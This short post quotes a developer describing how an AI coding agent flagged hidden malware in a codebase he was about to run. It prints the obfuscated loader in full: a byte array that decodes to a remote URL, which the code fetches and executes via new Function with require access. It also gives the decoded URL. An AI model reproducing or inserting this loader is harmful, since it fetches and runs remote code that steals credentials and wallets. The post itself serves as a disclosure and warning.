Hacked

David Dodda talking about his recent escape from being hacked by an ingenious method.

Before hitting npm start, I threw this prompt at my Cursor AI agent:

“Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.”

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty:

//Get Cookie  
(async () => {  
    const byteArray = [  
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,  
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,  
        98, 50, 48, 51, 49, 102, 98, 57  
    ];  
    const uint8Array = new Uint8Array(byteArray);  
    const decoder = new TextDecoder('utf-8');  
    axios.get(decoder.decode(uint8Array))  
        .then(response => {  
            new Function("require", response.data.model)(require);  
        })  
        .catch(error => { });  
})();

Obfuscated. Sneaky. Evil. And 100% active – embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything – crypto wallets, files, passwords, your entire digital existence.

Here’s the kicker: the URL died exactly 24 hours later. These guys weren’t messing around – they had their infrastructure set up to burn evidence fast.

AI saved the day.